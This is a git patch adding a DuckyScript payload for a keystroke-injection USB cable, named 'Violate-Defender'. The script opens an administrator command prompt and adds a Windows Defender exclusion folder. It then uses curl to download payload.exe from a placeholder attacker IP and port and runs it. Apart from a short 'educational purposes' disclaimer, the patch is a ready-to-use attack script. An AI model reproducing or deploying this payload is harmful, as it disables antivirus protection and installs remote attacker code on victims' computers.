From c1882928ee94cf638918dd137800e456a35eeafa Mon Sep 17 00:00:00 2001
From: Tyler <150699522+Damaged-Justice@users.noreply.github.com>
Date: Mon, 1 Jan 2024 20:56:44 -0500
Subject: [PATCH] Create Violate-Defender

### FOR EDUCATIONAL PURPOSES ONLY ####
This is a simple DuckyScript that has been tested on the O.MG cable. it is designed to create a rule expection to a folder usering powershell to circumvent Windows Defender. this may only work if the user/target in quesiton has elevated rights to run a cmd/powershell prompt as Administrator. the script will use the curl command and download a file from your attacker machine and place it into a  created folder of your choice while applying the execption to that folder.
---
 .../library/remote_access/Violate-Defender    | 38 +++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 payloads/library/remote_access/Violate-Defender

diff --git a/payloads/library/remote_access/Violate-Defender b/payloads/library/remote_access/Violate-Defender
new file mode 100644
index 0000000..b66e9fc
--- /dev/null
+++ b/payloads/library/remote_access/Violate-Defender
@@ -0,0 +1,38 @@
+DUCKY_LANG US
+DELAY 2000
+GUI r 
+STRING cmd
+DELAY 300
+CTRL+SHIFT ENTER
+DELAY 300
+TAB
+DELAY 200
+TAB 
+DELAY 200
+TAB 
+ENTER
+DELAY 200
+STRING powershell
+DELAY 500
+ENTER
+STRING mkdir C:\<created folder of your choice> ### change me ###
+DELAY 100
+ENTER
+STRING Add-MpPreference -ExclusionPath 'C:\folder of your choice' ### change me ###
+ENTER
+DELAY 500
+STRING curl http://<---IP---->:<PORT>/payload.exe -o C:\folder_of_choice\created_payload.exe ### change me ###
+ENTER
+DELAY 500
+STRING cd C:\<created folder> 
+ENTER
+DELAY 200
+STRING .\payload.exe ### change to desired, compiled payload ###
+ENTER
+DELAY 1000
+STRING exit
+ENTER
+DELAY 100
+STRING exit
+DELAY 100
+ENTER